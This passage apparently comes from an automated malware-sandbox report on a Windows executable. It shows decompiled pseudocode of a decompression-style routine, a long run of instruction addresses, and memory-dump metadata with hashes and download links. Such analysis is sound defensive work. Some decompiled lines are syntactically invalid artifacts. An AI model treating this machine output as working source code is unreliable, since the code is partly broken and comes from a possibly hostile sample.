														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                            0x00000000
                                                                            0x00406bc4
                                                                            0x00406bc4
                                                                            0x00406bc8
                                                                            0x00406be9
                                                                            0x00406bf0
                                                                            0x00406bf6
                                                                            0x00406bfc
                                                                            0x00406c0e
                                                                            0x00406c14
                                                                            0x00406c19
                                                                            0x00000000
                                                                            0x00406bca
                                                                            0x00406bd0
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f9a
                                                                            0x00406fa0
                                                                            0x00406fa6
                                                                            0x00406fc0
                                                                            0x00406fc3
                                                                            0x00406fc9
                                                                            0x00406fd4
                                                                            0x00406fd6
                                                                            0x00406fa8
                                                                            0x00406fa8
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fe2
                                                                            0x00406fe6
                                                                            0x00407195
                                                                            0x004071ab
                                                                            0x004071b3
                                                                            0x004071ba
                                                                            0x004071bc
                                                                            0x004071c3
                                                                            0x004071c7
                                                                            0x004071c7
                                                                            0x00406ff2
                                                                            0x00406ff9
                                                                            0x00407001
                                                                            0x00407004
                                                                            0x00407007
                                                                            0x00407007
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x00000000
                                                                            0x004067c3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067cc
                                                                            0x004067cf
                                                                            0x004067d2
                                                                            0x004067d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067dc
                                                                            0x004067df
                                                                            0x004067e1
                                                                            0x004067e2
                                                                            0x004067e5
                                                                            0x004067e7
                                                                            0x004067e8
                                                                            0x004067ea
                                                                            0x004067ed
                                                                            0x004067f2
                                                                            0x004067f7
                                                                            0x00406800
                                                                            0x00406813
                                                                            0x00406816
                                                                            0x00406822
                                                                            0x0040684a
                                                                            0x0040684c
                                                                            0x0040685a
                                                                            0x0040685a
                                                                            0x0040685e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x0040684e
                                                                            0x00406851
                                                                            0x00406852
                                                                            0x00406852
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x00406828
                                                                            0x0040682d
                                                                            0x0040682d
                                                                            0x00406836
                                                                            0x0040683e
                                                                            0x00406841
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406864
                                                                            0x00406864
                                                                            0x00406868
                                                                            0x00407114
                                                                            0x00000000
                                                                            0x00407114
                                                                            0x00406871
                                                                            0x00406881
                                                                            0x00406884
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x0040688a
                                                                            0x0040688e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406890
                                                                            0x00406896
                                                                            0x004068c0
                                                                            0x004068c6
                                                                            0x004068cd
                                                                            0x00000000
                                                                            0x004068cd
                                                                            0x0040689c
                                                                            0x0040689f
                                                                            0x004068a4
                                                                            0x004068a4
                                                                            0x004068af
                                                                            0x004068b7
                                                                            0x004068ba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068ff
                                                                            0x00406905
                                                                            0x00406908
                                                                            0x00406915
                                                                            0x0040691d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068d4
                                                                            0x004068d4
                                                                            0x004068d8
                                                                            0x00407123
                                                                            0x00000000
                                                                            0x00407123
                                                                            0x004068e4
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068f2
                                                                            0x004068f5
                                                                            0x004068f8
                                                                            0x004068fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f9a
                                                                            0x00406fa0
                                                                            0x00406fa6
                                                                            0x00406fc0
                                                                            0x00406fc3
                                                                            0x00406fc9
                                                                            0x00406fd4
                                                                            0x00406fd6
                                                                            0x00406fa8
                                                                            0x00406fa8
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406925
                                                                            0x00406927
                                                                            0x0040692a
                                                                            0x0040699b
                                                                            0x0040699e
                                                                            0x004069a1
                                                                            0x004069a8
                                                                            0x004069b2
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x0040692c
                                                                            0x00406930
                                                                            0x00406933
                                                                            0x00406935
                                                                            0x00406938
                                                                            0x0040693b
                                                                            0x0040693d
                                                                            0x00406940
                                                                            0x00406942
                                                                            0x00406947
                                                                            0x0040694a
                                                                            0x0040694d
                                                                            0x00406951
                                                                            0x00406958
                                                                            0x0040695b
                                                                            0x00406962
                                                                            0x00406966
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x00406972
                                                                            0x00406975
                                                                            0x00406993
                                                                            0x00406995
                                                                            0x00000000
                                                                            0x00406977
                                                                            0x00406977
                                                                            0x0040697a
                                                                            0x0040697d
                                                                            0x00406980
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406985
                                                                            0x00406988
                                                                            0x0040698a
                                                                            0x0040698b
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c2e
                                                                            0x00406c32
                                                                            0x00406c55
                                                                            0x00406c58
                                                                            0x00406c5b
                                                                            0x00406c65
                                                                            0x00406c34
                                                                            0x00406c34
                                                                            0x00406c37
                                                                            0x00406c3a
                                                                            0x00406c3d
                                                                            0x00406c4a
                                                                            0x00406c4d
                                                                            0x00406c4d
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406c71
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c7b
                                                                            0x00406c7f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c85
                                                                            0x00406c87
                                                                            0x00406c8b
                                                                            0x00406c8b
                                                                            0x00406c8e
                                                                            0x00406c92
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ce2
                                                                            0x00406ce6
                                                                            0x00406ced
                                                                            0x00406cf0
                                                                            0x00406cf3
                                                                            0x00406cfd
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406ce8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d09
                                                                            0x00406d0d
                                                                            0x00406d14
                                                                            0x00406d17
                                                                            0x00406d1a
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d1d
                                                                            0x00406d20
                                                                            0x00406d23
                                                                            0x00406d23
                                                                            0x00406d26
                                                                            0x00406d29
                                                                            0x00406d2c
                                                                            0x00406d2c
                                                                            0x00406d2f
                                                                            0x00406d36
                                                                            0x00406d3b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dc9
                                                                            0x00406dc9
                                                                            0x00406dcd
                                                                            0x0040716b
                                                                            0x00000000
                                                                            0x0040716b
                                                                            0x00406dd3
                                                                            0x00406dd6
                                                                            0x00406dd9
                                                                            0x00406ddd
                                                                            0x00406de0
                                                                            0x00406de6
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406deb
                                                                            0x00406dee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069be
                                                                            0x004069be
                                                                            0x004069c2
                                                                            0x0040712f
                                                                            0x00000000
                                                                            0x0040712f
                                                                            0x004069c8
                                                                            0x004069cb
                                                                            0x004069ce
                                                                            0x004069d2
                                                                            0x004069d5
                                                                            0x004069db
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069e0
                                                                            0x004069e3
                                                                            0x004069e3
                                                                            0x004069e6
                                                                            0x004069e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069ef
                                                                            0x004069f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069fb
                                                                            0x004069fb
                                                                            0x004069ff
                                                                            0x00406a02
                                                                            0x00406a05
                                                                            0x00406a08
                                                                            0x00406a0b
                                                                            0x00406a0c
                                                                            0x00406a0f
                                                                            0x00406a11
                                                                            0x00406a17
                                                                            0x00406a1a
                                                                            0x00406a1d
                                                                            0x00406a20
                                                                            0x00406a23
                                                                            0x00406a26
                                                                            0x00406a29
                                                                            0x00406a45
                                                                            0x00406a48
                                                                            0x00406a4b
                                                                            0x00406a4e
                                                                            0x00406a55
                                                                            0x00406a59
                                                                            0x00406a5b
                                                                            0x00406a5f
                                                                            0x00406a2b
                                                                            0x00406a2b
                                                                            0x00406a2f
                                                                            0x00406a37
                                                                            0x00406a3c
                                                                            0x00406a3e
                                                                            0x00406a40
                                                                            0x00406a40
                                                                            0x00406a62
                                                                            0x00406a69
                                                                            0x00406a6c
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a77
                                                                            0x00406a77
                                                                            0x00406a7b
                                                                            0x0040713b
                                                                            0x00000000
                                                                            0x0040713b
                                                                            0x00406a81
                                                                            0x00406a84
                                                                            0x00406a87
                                                                            0x00406a8b
                                                                            0x00406a8e
                                                                            0x00406a94
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a99
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406aa2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406aa4
                                                                            0x00406aa7
                                                                            0x00406aaa
                                                                            0x00406aad
                                                                            0x00406ab0
                                                                            0x00406ab3
                                                                            0x00406ab6
                                                                            0x00406ab9
                                                                            0x00406abc
                                                                            0x00406abf
                                                                            0x00406ac2
                                                                            0x00406ada
                                                                            0x00406add
                                                                            0x00406ae0
                                                                            0x00406ae3
                                                                            0x00406ae3
                                                                            0x00406ae6
                                                                            0x00406aea
                                                                            0x00406aec
                                                                            0x00406ac4
                                                                            0x00406ac4
                                                                            0x00406acc
                                                                            0x00406ad1
                                                                            0x00406ad3
                                                                            0x00406ad5
                                                                            0x00406ad5
                                                                            0x00406aef
                                                                            0x00406af6
                                                                            0x00406af9
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00406af9
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b3b
                                                                            0x00406b3b
                                                                            0x00406b3f
                                                                            0x00407147
                                                                            0x00000000
                                                                            0x00407147
                                                                            0x00406b45
                                                                            0x00406b48
                                                                            0x00406b4b
                                                                            0x00406b4f
                                                                            0x00406b52
                                                                            0x00406b58
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5d
                                                                            0x00406b60
                                                                            0x00406b60
                                                                            0x00406b66
                                                                            0x00406b04
                                                                            0x00406b04
                                                                            0x00406b07
                                                                            0x00000000
                                                                            0x00406b07
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6b
                                                                            0x00406b6e
                                                                            0x00406b71
                                                                            0x00406b74
                                                                            0x00406b77
                                                                            0x00406b7a
                                                                            0x00406b7d
                                                                            0x00406b80
                                                                            0x00406b83
                                                                            0x00406b86
                                                                            0x00406b9e
                                                                            0x00406ba1
                                                                            0x00406ba4
                                                                            0x00406ba7
                                                                            0x00406ba7
                                                                            0x00406baa
                                                                            0x00406bae
                                                                            0x00406bb0
                                                                            0x00406b88
                                                                            0x00406b88
                                                                            0x00406b90
                                                                            0x00406b95
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406bb3
                                                                            0x00406bba
                                                                            0x00406bbd
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406e4c
                                                                            0x00406e4c
                                                                            0x00406e50
                                                                            0x00407177
                                                                            0x00000000
                                                                            0x00407177
                                                                            0x00406e56
                                                                            0x00406e59
                                                                            0x00406e5c
                                                                            0x00406e60
                                                                            0x00406e63
                                                                            0x00406e69
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c1c
                                                                            0x00406c1c
                                                                            0x00406c1f
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f5b
                                                                            0x00406f5f
                                                                            0x00406f81
                                                                            0x00406f84
                                                                            0x00406f8e
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f61
                                                                            0x00406f64
                                                                            0x00406f68
                                                                            0x00406f6b
                                                                            0x00406f6b
                                                                            0x00406f6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407018
                                                                            0x0040701c
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x00407041
                                                                            0x00407048
                                                                            0x0040704f
                                                                            0x0040704f
                                                                            0x00000000
                                                                            0x0040704f
                                                                            0x0040701e
                                                                            0x00407021
                                                                            0x00407024
                                                                            0x00407027
                                                                            0x0040702e
                                                                            0x00406f72
                                                                            0x00406f72
                                                                            0x00406f75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407109
                                                                            0x0040710c
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d43
                                                                            0x00406d45
                                                                            0x00406d4c
                                                                            0x00406d4d
                                                                            0x00406d4f
                                                                            0x00406d52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d5a
                                                                            0x00406d5d
                                                                            0x00406d60
                                                                            0x00406d62
                                                                            0x00406d64
                                                                            0x00406d64
                                                                            0x00406d65
                                                                            0x00406d68
                                                                            0x00406d6f
                                                                            0x00406d72
                                                                            0x00406d80
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407056
                                                                            0x00407056
                                                                            0x00407059
                                                                            0x00407060
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407065
                                                                            0x00407065
                                                                            0x00407069
                                                                            0x004071a1
                                                                            0x00000000
                                                                            0x004071a1
                                                                            0x0040706f
                                                                            0x00407072
                                                                            0x00407075
                                                                            0x00407079
                                                                            0x0040707c
                                                                            0x00407082
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407087
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708d
                                                                            0x0040708d
                                                                            0x00407091
                                                                            0x004070f1
                                                                            0x004070f4
                                                                            0x004070f9
                                                                            0x004070fa
                                                                            0x004070fc
                                                                            0x004070fe
                                                                            0x00407101
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x00407013
                                                                            0x0040700d
                                                                            0x00407093
                                                                            0x00407099
                                                                            0x0040709c
                                                                            0x0040709f
                                                                            0x004070a2
                                                                            0x004070a5
                                                                            0x004070a8
                                                                            0x004070ab
                                                                            0x004070ae
                                                                            0x004070b1
                                                                            0x004070b4
                                                                            0x004070cd
                                                                            0x004070d0
                                                                            0x004070d3
                                                                            0x004070d6
                                                                            0x004070da
                                                                            0x004070dc
                                                                            0x004070dc
                                                                            0x004070dd
                                                                            0x004070e0
                                                                            0x004070b6
                                                                            0x004070b6
                                                                            0x004070be
                                                                            0x004070c3
                                                                            0x004070c5
                                                                            0x004070c8
                                                                            0x004070c8
                                                                            0x004070e3
                                                                            0x004070ea
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x00406d88
                                                                            0x00406d8b
                                                                            0x00406dc1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef4
                                                                            0x00406ef4
                                                                            0x00406ef7
                                                                            0x00406ef9
                                                                            0x00407183
                                                                            0x00000000
                                                                            0x00407183
                                                                            0x00406eff
                                                                            0x00406f02
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f08
                                                                            0x00406f0c
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00000000
                                                                            0x00406f0f
                                                                            0x00406d8d
                                                                            0x00406d8f
                                                                            0x00406d91
                                                                            0x00406d93
                                                                            0x00406d96
                                                                            0x00406d97
                                                                            0x00406d99
                                                                            0x00406d9b
                                                                            0x00406d9e
                                                                            0x00406da1
                                                                            0x00406db7
                                                                            0x00406dbc
                                                                            0x00406df4
                                                                            0x00406df4
                                                                            0x00406df8
                                                                            0x00406e24
                                                                            0x00406e26
                                                                            0x00406e2d
                                                                            0x00406e30
                                                                            0x00406e33
                                                                            0x00406e33
                                                                            0x00406e38
                                                                            0x00406e38
                                                                            0x00406e3a
                                                                            0x00406e3d
                                                                            0x00406e44
                                                                            0x00406e47
                                                                            0x00406e74
                                                                            0x00406e74
                                                                            0x00406e77
                                                                            0x00406e7a
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00000000
                                                                            0x00406eee
                                                                            0x00406e7c
                                                                            0x00406e82
                                                                            0x00406e85
                                                                            0x00406e88
                                                                            0x00406e8b
                                                                            0x00406e8e
                                                                            0x00406e91
                                                                            0x00406e94
                                                                            0x00406e97
                                                                            0x00406e9a
                                                                            0x00406e9d
                                                                            0x00406eb6
                                                                            0x00406eb8
                                                                            0x00406ebb
                                                                            0x00406ebc
                                                                            0x00406ebf
                                                                            0x00406ec1
                                                                            0x00406ec4
                                                                            0x00406ec6
                                                                            0x00406ec8
                                                                            0x00406ecb
                                                                            0x00406ecd
                                                                            0x00406ed0
                                                                            0x00406ed4
                                                                            0x00406ed6
                                                                            0x00406ed6
                                                                            0x00406ed7
                                                                            0x00406eda
                                                                            0x00406edd
                                                                            0x00406e9f
                                                                            0x00406e9f
                                                                            0x00406ea7
                                                                            0x00406eac
                                                                            0x00406eae
                                                                            0x00406eb1
                                                                            0x00406eb1
                                                                            0x00406ee0
                                                                            0x00406ee7
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00406ee7
                                                                            0x00406dfa
                                                                            0x00406dfd
                                                                            0x00406dff
                                                                            0x00406e02
                                                                            0x00406e05
                                                                            0x00406e08
                                                                            0x00406e0a
                                                                            0x00406e0d
                                                                            0x00406e10
                                                                            0x00406e10
                                                                            0x00406e13
                                                                            0x00406e13
                                                                            0x00406e16
                                                                            0x00406e1d
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00406e1d
                                                                            0x00406da3
                                                                            0x00406da6
                                                                            0x00406da8
                                                                            0x00406dab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b0a
                                                                            0x00406b0a
                                                                            0x00406b0e
                                                                            0x00407153
                                                                            0x00000000
                                                                            0x00407153
                                                                            0x00406b14
                                                                            0x00406b17
                                                                            0x00406b1a
                                                                            0x00406b1d
                                                                            0x00406b20
                                                                            0x00406b23
                                                                            0x00406b26
                                                                            0x00406b28
                                                                            0x00406b2b
                                                                            0x00406b2e
                                                                            0x00406b31
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c95
                                                                            0x00406c95
                                                                            0x00406c99
                                                                            0x0040715f
                                                                            0x00000000
                                                                            0x0040715f
                                                                            0x00406c9f
                                                                            0x00406ca2
                                                                            0x00406ca5
                                                                            0x00406ca8
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406cad
                                                                            0x00406cb0
                                                                            0x00406cb3
                                                                            0x00406cb6
                                                                            0x00406cb9
                                                                            0x00406cbc
                                                                            0x00406cbd
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cc2
                                                                            0x00406cc5
                                                                            0x00406cc8
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406cce
                                                                            0x00406cd0
                                                                            0x00406cd0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f1c
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f2a
                                                                            0x00406f2d
                                                                            0x00406f30
                                                                            0x00406f33
                                                                            0x00406f36
                                                                            0x00406f39
                                                                            0x00406f3a
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3f
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4f
                                                                            0x00406f51
                                                                            0x00406f54
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00406cd3
                                                                            0x00406cd3
                                                                            0x00000000
                                                                            0x00406cd3
                                                                            0x00406f54
                                                                            0x00407189
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x004071c0
                                                                            0x004071c0
                                                                            0x00000000
                                                                            0x004071c0
                                                                            0x0040700d
                                                                            0x00406f94
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406bc8

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                                                            • Instruction ID: 28a04b8f37ec13448d59bb684de8c36190a5ca9e173ef22aca7ace3c2f707fcc
                                                                            • Opcode Fuzzy Hash: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                                                            • Instruction Fuzzy Hash: F2713471D04229CFDF28CF98C8447ADBBB1FB48305F15806AD846BB281C7386996DF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406CE2, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
